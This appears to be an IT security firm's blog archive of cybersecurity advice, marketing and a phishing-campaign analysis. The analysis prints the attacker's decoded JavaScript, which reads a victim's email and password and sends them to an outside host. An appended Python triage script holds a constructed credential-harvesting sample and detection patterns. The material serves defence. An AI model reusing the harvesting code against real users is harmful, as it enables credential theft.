20 April 2022

5 Ways to Overcome Cybersecurity Challenges in Uncertain Times

According to the World Economic Forum’s The Global Risks Report 2021, cyber threats are among the leading global risks. 

With remote and hybrid work changing the landscape of how businesses operate, new vulnerabilities have emerged practically overnight. Hacks are now more commonplace due to the rise of mobile usage and the internet of things (IoT). Data protection compliance has become more complex with the introduction of regimes like GDPR. And, to compound this, a growing ecosystem of cybercriminals is more technologically savvy than ever, resulting in sophisticated cyberattacks that can get around an organisation’s employees, firewalls or SIEM software, and cost companies millions of dollars. 

There’s no doubt that cybersecurity is something to pay attention to. It’s an issue that’s made its way into the boardrooms of companies large and small, impacting even the world’s most prominent financial and healthcare organisations. 

Now more than ever, it’s crucial to understand and develop strategies to overcome cybersecurity challenges. Here are five ways to prepare yourself and your company, so you can strengthen your cybersecurity posture and be future-ready. 

 

1. Understand how cybercrime tactics have evolved

Cybercriminals are opportunists. New technology, processes and practices are always being developed. And, at the same time, threat actors, including ransomware groups and adversarial governments, are constantly adapting their methods to circumvent security measures.  

Though cybercriminals are usually motivated by money, some also want to expose data and confidential information or simply damage a company’s reputation. 

The most common types of cybercrime tactics include:

  • Distributed denial of service (DDoS): A disruption of network service where attackers send high volumes of traffic at a network, which then becomes overloaded and stops working. 
  • Phishing: When cybercriminals “fish” for data from third parties, usually via email. These phishing emails are becoming increasingly sophisticated, so much so that some of them can only be distinguished from legitimate mail by cybersecurity experts. 
  • Malware: Also known as malicious software, malware comprises over one half of all cybercrimes. It’s designed to gain access to a computer or network, and is often introduced via email attachments, software downloads or OS vulnerabilities. 
  • Internal privilege misuse: This is when an opportunistic employee secretly steals or leaks confidential information for monetary gain. They can also take personal information, including healthcare data, for financial crimes or identity theft. 

 

The COVID-19 pandemic intensified the rate of cyberattacks. As companies were forced to experience rapid digital transformation and implement remote work arrangements, cracks appeared which cybercriminals knew they could exploit. 

Even though it’s been more than two years since the pandemic began, many overworked and unprepared IT departments are still struggling to keep up with security demands. Employees are still logging into corporate networks from unsecured computers. And cybercriminals have found ways to target software like Zoom and Microsoft Teams. 

Cybercriminals also take advantage of urgency. During the pandemic, Cayman experienced a spike in phishing attacks and malware, which was largely due to cybercriminals exploiting people’s fear of medical equipment shortages, and the urgent need for fundraising.

Finally, for the most part, cybercriminals operate worldwide and know no borders. A crop of “corporate cybercriminals” has emerged, who are more savvy and have access to extensive resources to pivot quickly – taking advantage of vulnerabilities.

The first step to keeping your company secure is to understand, and stay on top of, these trends.

 

2. Prioritise cloud and endpoint security

Cloud and hybrid OS and data systems are here to stay. This has caused unique challenges for companies that have traditionally operated using on-premise networks. 

The good news is that cloud networks are often more inherently secure than on-premise networks, but customers need to understand that they have a shared responsibility for cloud security. Failing to recognise this can lead to costly outcomes. In fact, Gartner predicts that through 2025, 90% of the organisations that fail to control public cloud use will inappropriately share sensitive data. 

Adding to the complexity is the rise of BYOD (bring your own device) and remote work policies. This raises concerns around endpoint protection. Simply put, an endpoint is one end of a communication channel, and in a workplace context involves items like laptops, mobile devices, tablets and printers. Cybercriminals can exploit unprotected endpoints and use them as an entry point into your network.

As cloud infrastructures grow, and more companies enter into hybrid cloud and remote work scenarios, it’s important for companies to prioritise cloud and endpoint security. 

 

3. Embrace end-user cyber security training 

The biggest security gaps usually lie with end-users. In fact, according to Gartner, 99% of cloud security incidents through 2025 will be due to end-user errors. That means it’s important to create a corporate cybersecurity policy that includes comprehensive end-user training. 

Developing employee knowledge around what to watch for, how cybercrime works and cybersafe best practices will go a long way in ensuring your company and your employees are protected.

End-user training can include:

  • How to recognise phishing and social engineering attacks
  • Best practices to manage passwords
  • Steps to keep devices and endpoints secure
  • How to avoid malware and ransomware attacks
  • Physical security tips, such as device and document locking

 

4. Recruit top IT talent

According to a 2021 study by Gartner, the biggest barrier to adopting new technology is a lack of talent. This is especially the case when it comes to security technology and cybersecurity talent.

Compounding this problem is the fact that IT budgets are often stretched thin. When resources are limited, companies tend to put them towards supporting day-to-day needs, rather than towards measures that are preventive or proactive. Unfortunately, it often takes a breach or cybersecurity incident to occur before companies will invest in cybersecurity talent.

Of course, “talent” doesn’t necessarily mean every employee needs to be a cybersecurity expert. It means finding and fostering a team that’s keen to learn and adopt new technologies, committed to staying current on cybersecurity threats and that’s generally aware of cybercrime tactics. 

If you’re unable to find the right talent, outsourcing this role to an expert is another option. That takes us to our final point.

 

5. Consider hiring cybersecurity experts to support your IT team

 

With competing priorities and technology continually evolving, IT departments are stretched thin. 

Although guidance documents – such as Cayman’s Statement of Guidance: Cybersecurity for Regulated Entities – are available to support cybersecurity teams, they can be difficult to implement alone.

As a result, it can be cost-effective to utilise a managed cybersecurity service or IT security partner. Good cybersecurity experts are up-to-date on the latest issues, are ready to get your organisation compliant with regulations like GDPR, HIPAA or Cayman’s data protection legislation, and can create and monitor your systems with advanced SIEM software. 

Outsourcing your cybersecurity to experts who are already well-versed in all aspects of your security needs – including policies, infrastructure, cloud services and other services – can also free up time for your IT team to focus on key strategic priorities.

 

Partner with Kirk ISS and take control of your cybersecurity

If you’re seeking a cybersecurity partner to help keep your business safe, Kirk ISS is here to help. We offer a full range of cybersecurity services including:

Cybersecurity Assessments

Get a comprehensive review of your organisation’s cyber security posture, highlighting gaps in your defenses and recommending specific steps to remediate them. Help satisfy data protection regulations and stay compliant.

  • Cybersecurity risk assessments
  • Penetration testing
  • Office 365 security assessment

Penetration Testing

See how a simulated attack on your network would play out if an attacker were to bypass your existing controls. Verify which controls are adequate, which should be revised and where the vulnerabilities within your network lie. 

Social Engineering Assessments

Get customisable scenarios that test the controls and security awareness levels of your end users. Understand where your vulnerabilities are and show end users how to identify phishing and what to do when it occurs.

  • Email and website campaigns
  • Voice phishing (vishing) campaigns
  • Physical access walkthroughs

Managed Cybersecurity (SOC as a Service)

Benefit from a fully-managed Security Operations Centre (SOC) that delivers the protection modern businesses need, without costly infrastructure or time-consuming management. Our SOC aggregates and analyses data points across your organisation to proactively identify threats, combining specialised tools, organisation-specific alerting models and 24/7 monitoring.

Serving the Cayman Islands since 2005, our team of IT experts can help keep your data safe, your employees protected and your operations running smoothly.

To learn more or book a free discovery call, contact us today.

3 November 2021

Microsoft 365 Defender Named Forrester Leader for XDR, Q4 2021




Earlier this week, Microsoft announced that Microsoft 365 Defender was named a Leader in The Forrester New Wave™: Extended Detection and Response (XDR) category for Q4 of 2021. XDR (Extended Detection and Response) tools have seemingly popped up everywhere as the latest tool to give organisations real-time insight into cyber threats. In an already saturated market for XDR and security tools alike, Microsoft has done well to mature its offering, as evidenced by taking a different approach: XDR tools need to not only identify threats effectively but also provide enough data to be managed effectively by cybersecurity experts.

A powerful security tool…

At Kirk ISS, we’ve found the Microsoft 365 Defender suite performs excellently when paired with deeper licensing. The more cybersecurity-centric licenses, such as Microsoft 365 Business Premium, Enterprise Mobility + Security E5, and Defender for Endpoint, provide enriched data that feeds into Microsoft 365 Defender. When this data is presented in a single pane of glass to our cybersecurity analysts, threats can be identified and mitigated earlier in the cyber kill chain with less impact on customers.

So, what does this mean for your company?

The good news is that if you are already utilising portions of the Microsoft stack in your day-to-day operations, Microsoft 365 Defender is already working hard to keep your data secure. However, it really shines by aggregating data effectively across all aspects of an organisation so that seasoned cybersecurity experts can identify threats quickly. Our SOCaaS, the only on-island Security Operations Centre in the Cayman Islands, is powered by Azure Sentinel, a natural extension to the award-winning XDR tool. To learn more about how our SOCaaS can leverage Microsoft 365 Defender to secure your organisation, reach out to Kirk ISS today.

12 October 2021

Cybersecurity Best Practices: Quick Wins for Organisations




In light of the rapid change from corporate offices to remote workforces, organisations have been forced to focus on cybersecurity more than ever. Developing a robust cybersecurity framework that cascades throughout the business is paramount to ensuring the remote workforces are as protected as their office counterparts. For most organisations, the cybersecurity foundation starts with simple, yet sensible data protection policies and rules that are consistently enforced. Several examples of easy ways to bolster your organisation’s cybersecurity framework include:

 

Develop Formal IT Policies and Procedures

Almost every industry has some form of regulatory guidance for organisations to adhere to. Financially regulated entities have items like CIMA’s Statement of Guidance, vendors and retailers must adhere to the Payment Card Industry (PCI) standards, and every organisation needs to be aware of the EU’s General Data Protection Regulation (GDPR). Creating formal IT policies and procedures goes beyond rules for employees to follow when using their work computers – it creates a foundation for how the organisation will operate should it need to recover from a disaster or plan for business continuity, how it manages its third-party affiliates and vendors, and how it plans to respond to cybersecurity threats and incidents.

 

 

Train Cyber Ninja Employees

*In 2021, nearly 85% of data breaches involved some form of human element to gain entry into a network. Training your staff to identify threats is key to preventing a cybersecurity incident from occurring. The best training doesn’t happen in a vacuum – the cyber threat landscape evolves constantly, requiring at least annual refreshers for employees to be set up for success. Our cybersecurity team conducts regular End User Awareness Training, along with simulated Social Engineering Assessments, to proactively identify areas to strengthen.

 

 

Tighten Cloud-Based Platforms

Work from home is rapidly evolving into work from anywhere. With BYOD becoming the norm for more and more organisations, it’s important to employ effective mobile access policies. Spending time to review cloud-based platforms, such as Microsoft Azure and Office 365 controls will help define security baselines to ensure resources are protected no matter where they are stored. Some controls should include the use of Multi-Factor Authentication (MFA), password managers, Conditional Access policies, compliance and configuration baselines, remote management of devices, and identity protection for users and corporate resources alike. Kirk ISS regularly reviews customer baselines during our Infrastructure Audits to uncover gaps in configurations, helping strengthen their cybersecurity posture.

 

 

Think Like an Adversary

Regardless of whether you believe that “offense wins games, but defense wins championships”, the truth is there are more attackers than there are defenders in the cybersecurity workforce. *Gartner reports that in 2019, there was a deficit of nearly 65% between roles waiting to be filled and the talent pool of cybersecurity professionals. What does this mean for you? Small to medium businesses may not have the budget or need for a fully-fledged cybersecurity team to proactively monitor, identify, and respond to threats like large organisations do, but the need is there. Kirk ISS has developed a SOC as a Service (SOCaaS) to provide budget-friendly, cost-effective methods of proactive cyber threat monitoring. In addition, assessments like Network Security Assessments have our cybersecurity professionals simulate hacking activities to uncover vulnerabilities before they can be exploited by the real bad guys.

 

Balancing Security with Productivity

Cybersecurity has become ubiquitous with the current state of remote work and will continue to be a dominant concern. CIOs and IT managers will need to strike a balance between driving productivity and the very real need to protect data from an ever-evolving threat landscape. Fortunately, our team of cybersecurity experts can help if you need assistance deploying any of these best practices to protect your IT systems.

Some of the cybersecurity services we offer:

• Security Operations Centre as a Service (SOCaaS)
• Network Security Assessments/Penetration Testing
• Social Engineering Assessments
• Policy Creation
• End User Awareness Training
• Infrastructure Audits

* 2021 Verizon DBIR (https://enterprise.verizon.com/resources/reports/2021-data-breach-investigations-report.pdf)
* https://www.gartner.com/en/human-resources/research/talentneuron/labor-market-trends/cybersecurity-labor-shortage-and-covid-19

14 September 2021

CIMA Statement of Guidance and You: Cybersecurity for Regulated Entities




In May of 2020, CIMA released a statement of guidance discussing specific requirements for regulated entities within the cybersecurity space. In the guidance, CIMA issued recommendations based on other recent regulations, such as Cayman’s Data Protection Law and the now commonplace GDPR. In this statement of guidance, CIMA placed the responsibility of identifying, monitoring, and preventing cyber threats onto the shoulders of regulated entities. In addition to these requirements, CIMA also laid the groundwork for organisations to identify gaps within their risk profile, as well as take a deeper look into what vendors are being used.

A quick overview of the new requirements is listed below:

  • Cybersecurity threat monitoring and prevention
  • Risk assessment
  • Penetration testing
  • Policy creation and implementation, including:
    • Vendor Due Diligence
    • Business Continuity Planning
    • Incident Response
    • Breach Notifications

 

These threats are always present, and attackers using these techniques keep changing to evade security controls. While this may seem daunting to smaller organisations or those that have never had to think about these threats before, now is a good time to begin. There are several solutions out there, including those provided by Kirk ISS, that can help with not only regulatory satisfaction but also peace of mind.

Cybersecurity Threat Monitoring and Prevention

Kirk ISS has introduced SOC as a Service (SOCaaS) to customers in Cayman and throughout the Caribbean. SOCaaS provides organisations a cost-effective option for supplementing their IT environment with cybersecurity professionals who provide 24×7 support. SOCaaS utilises a “bring your own licensing” scheme that builds on what your organisation already has in place and can help shine a light on gaps in its security posture. SOCaaS also natively connects with Microsoft products, allowing Kirk ISS to proactively monitor and mitigate threats across your organisation, including email, identity management, Azure, Office 365, endpoints, and more. Analytics rules are deployed that identify threats such as phishing, brute forcing attempts, malware, data leakage, and more. More information about the Kirk ISS SOCaaS can be found here.

Penetration Testing

Penetration testing is a proactive assessment where cybersecurity professionals identify security vulnerabilities within an organisation in an effort to mitigate threats prior to attackers exploiting them. Kirk ISS’ cybersecurity engineers have years of experience performing penetration tests against organisations’ internal and external infrastructure, web applications, along with boutique testing scenarios.
Our Network Security Assessment (NSA) combines both traditional penetration testing and a vulnerability assessment to identify threats and misconfigurations within your organization. This approach is designed to provide granularity into not only underlying vulnerabilities, but to provide details about how they affect your overall security posture. More information about the Kirk ISS Network Security assessment can be found here.

Policy Creation

Written policies are the backbone of a successful information security program. Each organisation is different in the way they operate, deploy IT systems, and require each user to interact with internal resources. Without this baseline to refer to, an organisation is fighting uphill to define proper procedures and methodologies.
With years of experience working in cyber risk and threat management, Kirk ISS works with key stakeholders to help develop internal IT policies and procedures unique to your organisation. With CIMA’s Statement of Guidance as a baseline, we can develop mature IT policies to help make regulatory compliance much easier and help mold your organisation’s IT posture.

 

 

To learn more about where your organisation’s IT maturity lies compared to CIMA’s Statement of Guidance, contact Kirk ISS at 345-623-4730 or security@kirkiss.ky.

12 July 2021

Kirk ISS Named 2021 Microsoft Country Partner of the Year for the Cayman Islands




 

GEORGE TOWN, Grand Cayman, Cayman Islands — July 12, 2021 — Kirk ISS today announced it has won the Cayman Islands 2021 Microsoft Partner of the Year Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.

According to Kirk Office Managing Director Geoffrey Cuff, this year’s award is particularly special: “We’re thrilled to be recognized as the 2021 Microsoft Partner of the Year for the Cayman Islands. Over the last 12 months, our IT division at Kirk ISS has helped businesses overcome unprecedented challenges using Microsoft powered solutions, particularly in the cybersecurity space. Whether we are securing sensitive data or enabling remote working, our focus at Kirk ISS is always on helping businesses leverage technology to achieve more for their stakeholders. We’re incredibly proud to be recognized by a global technology leader like Microsoft for delivering the very best in cutting-edge cybersecurity solutions.”

The Microsoft Partner of the Year Awards recognize Microsoft partners that have developed and delivered outstanding Microsoft-based solutions during the past year. Awards were classified in various categories, with honorees chosen from a set of more than 4,400 submitted nominations from more than 100 countries worldwide. Kirk ISS was recognized for providing outstanding solutions and services in the Cayman Islands.

The Microsoft Country Partner of the Year Award recognizes one winning Microsoft partner per country for excellence in the delivery of Microsoft solutions and advancement of the company’s mission to empower every person and every organization on the planet to achieve more.

“I am honored to announce the winners and finalists of the 2021 Microsoft Partner of the Year Awards,” said Rodney Clark, corporate vice president, Global Partner Solutions, Channel Sales and Channel Chief, Microsoft. “These remarkable partners have displayed a deep commitment to building world-class solutions for customers—from cloud-to-edge—and represent some of the best and brightest our ecosystem has to offer.”

28 January 2021

Gone Phishing: A Deep Dive Into Phishing Campaigns




Kirk ISS Cybersecurity Post

Overview

Earlier this week, we uncovered a somewhat complex phishing campaign that both VirusTotal and Microsoft’s Automated Investigation and Response (AIR) classified as non-malicious. While the email itself was fairly innocuous (other than looking exactly like a phishing email and coming from a suspicious domain), the attachment it contained was what drew us in. Malicious attachments aren’t anything new, but this one contained thousands of lines of CSS and formatting to emulate an Outlook web login perfectly. In addition, it also had a massive block of Base64-encoded JavaScript that emulated a Microsoft login.

The result? A convincing phishing email designed to trick users into believing it is a legitimate page.

 

 

Deep Dive

The initial email was sent to addresses found by scraping a website. In one case, an “info@domain” account was both sender and recipient, adding some level of legitimacy. In another, the “info@domain” address sent the message to a user whose email was also scraped online.

 

 

The email stated the user had received a meeting notification, attached as an HTML document. Once downloaded, the attachment served two functions:

  1. Create a convincing Outlook web login attempt, and
  2. Trigger embedded Base64 JavaScript to replicate a Microsoft login and steal credentials.

 

 

The attachment took extreme care to make the webpage appear as authentic as possible; the first several hundred lines contained CSS and animations used by Microsoft. Once opened, an alert stating “Network Connection Error” appears regardless of connectivity – this portion is hard-coded for the case where a browser other than Edge is used.

 

 

To get a better understanding of the attachment, we dove into the source code and decoded all Base64 components. Here’s what happens under the hood when the user clicks the “retry” button:

    function start(){
        document.getElementById("mArea").style.opacity = 0;
        setTimeout(()=>{
            if(!isEdge() ){
                var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
                window.location.href =  toText(Base64.decode(nextHmtl))+ap;
            }
            else{
                document.write((Base64.decode(nextHmtl)));
            }
        },2500);
    }

 

The nextHmtl variable (as the attacker spelled it) is where the malicious JavaScript starts to take effect. Close to 6000 lines in length, only the last hundred or so are used for actually capturing credentials. The rest are spent pulling appropriate resources from Microsoft’s servers to give the appearance of a legitimate login attempt, pre-populated with the email recipient to provide additional “validity”.

 

 

Further investigation revealed users were forced to enter their password multiple times after an “invalid password” prompt. This acted as a verification mechanism that the given credential set was legitimate. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification system for the attacker. In the last step, all information entered by the victim is sent to an RSS feed in AWS, indicative of a “sit back and wait” phishing attack.

Here’s a look into what is harvested from the victim and sent back to the attacker:


    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {\n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {\n    title\n    description\n    feedUrl\n    siteUrl\n    siteName\n    imageUrl\n    generator\n    items {\n      title\n      url\n      description\n      date\n      enclosure {\n        url\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);
                    }

                } else{
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });

 

This email was unique in the effort it made to emulate code used by Microsoft to produce a near-identical login. By using the embedded and encoded script, it can run in the same browser tab to seem as innocuous as possible. While it may seem odd that this much effort was put into creating an attachment and not into the actual delivery of the email, it lends credence to the belief that this kit was most likely purchased for use in private campaigns.
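As an added example that is not part of the original post and is not Kirk ISS code, here is a Python triage script for HTML attachments of the kind analysed above. It targets the two mechanics the two snippets show: a loader that decodes a Base64 blob at runtime and either navigates to it or writes it into the page (with a browser check in between), and a form handler that reads a password field and sends it off in a URL query string. The script decodes embedded Base64 layers, matches string-level indicators in each layer, collects every URL and host contacted, and returns a verdict. The sample attachment embedded in it is constructed for this example (all hosts are under the reserved .invalid TLD) and is not the campaign's file; the indicator names, the triage_attachment function and the thresholds are this example's own assumptions.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the attachment structure described in the post:
# a lure page whose real payload is a Base64 blob decoded at runtime. Hosts use
# the reserved .invalid TLD; nothing here is the campaign's real file.
INNER_SCRIPT = r'''
$("#i0281").submit(function(e) {
    e.preventDefault();
    var _email = $("#firstem").val();
    var password = $("#secondpw").val();
    var data = {"operationName": "createFeed",
                "variables": {"url": "http://exfil.invalid/rss.php?u=" + _email + "&k=" + password}};
    $.ajax({url: 'https://relay.invalid/graphql', method: 'post',
            contentType: 'application/json', data: JSON.stringify(data)})
     .done(function() { window.location.href = "https://decoy.invalid/report.pdf"; });
});
'''

OUTER_TEMPLATE = '''<html><head><style>.lure { font-family: sans-serif; }</style></head>
<body><div id="mArea">Network Connection Error <button onclick="start()">Retry</button></div>
<script>
var nextHmtl = "__BLOB__";
function start() {
  if (!isEdge()) { window.location.href = toText(Base64.decode(nextHmtl)); }
  else { document.write(Base64.decode(nextHmtl)); }
}
</script></body></html>'''

SAMPLE_ATTACHMENT = OUTER_TEMPLATE.replace(
    "__BLOB__", base64.b64encode(INNER_SCRIPT.encode()).decode())
BENIGN_ATTACHMENT = "<html><body><p>Agenda for Tuesday: budget review.</p></body></html>"

# Heuristic indicators (names are this example's own). Staging indicators show a
# page that unpacks itself at runtime; harvest indicators show credential capture.
INDICATORS = {
    "runtime_base64_decode": re.compile(r"\b(?:atob|Base64\.decode)\s*\("),
    "decoded_content_written_to_page": re.compile(
        r"document\.write\s*\(\s*(?:[\w.]+\.)?(?:atob|decode)\s*\("),
    "navigation_to_decoded_content": re.compile(
        r"location\.href\s*=\s*[^;]*(?:atob|decode)\s*\("),
    "browser_fingerprint_branch": re.compile(r"navigator\.userAgent|\bisEdge\s*\("),
    "password_field_read": re.compile(
        r"(?:password|pw)\W{0,5}\)?\.val\(\)|type=['\"]password['\"]", re.I),
    "form_values_in_query_string": re.compile(r"\?[^\"'\s]*=[\"']\s*\+\s*\w+"),
}
STAGING = {"decoded_content_written_to_page", "navigation_to_decoded_content"}
HARVEST = {"password_field_read", "form_values_in_query_string"}

BLOB_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")   # long Base64 runs only
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
MAX_DEPTH = 3                                          # guard against nested decode bombs


def _scan(text, depth, report):
    """Record indicators and URLs in one layer, then decode and recurse into blobs."""
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            report["indicators"].add(name)
    for url in URL_RE.findall(text):
        report["urls"].add(url)
        report["hosts"].add(urlsplit(url).hostname)
    if depth >= MAX_DEPTH:
        return
    for blob in BLOB_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                     # not text, or not really Base64
        report["layers_decoded"] += 1
        _scan(decoded, depth + 1, report)


def classify(indicators):
    """Staging plus harvest together is the credential-phishing pattern from the post."""
    if indicators & STAGING and indicators & HARVEST:
        return "credential-phishing"
    return "suspicious" if indicators else "no-indicators"


def triage_attachment(html):
    """Static triage of an HTML attachment; returns indicators, URLs, hosts and a verdict."""
    report = {"indicators": set(), "urls": set(), "hosts": set(), "layers_decoded": 0}
    _scan(html, 0, report)
    report["verdict"] = classify(report["indicators"])
    return report


if __name__ == "__main__":
    for label, sample in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        r = triage_attachment(sample)
        print(label, r["verdict"], sorted(r["indicators"]), sorted(r["hosts"]), r["layers_decoded"])
```

To run this against a quarantined attachment, read the file as text and pass it to triage_attachment; the hosts set is what you would feed to mail and proxy blocklists. The indicators are deliberately string-level heuristics, so a kit that hides its second stage behind something other than plain Base64 (hex strings, split-and-join, a custom decoder) needs a decoding step added to _scan before the same indicators will fire on the inner layer.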

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125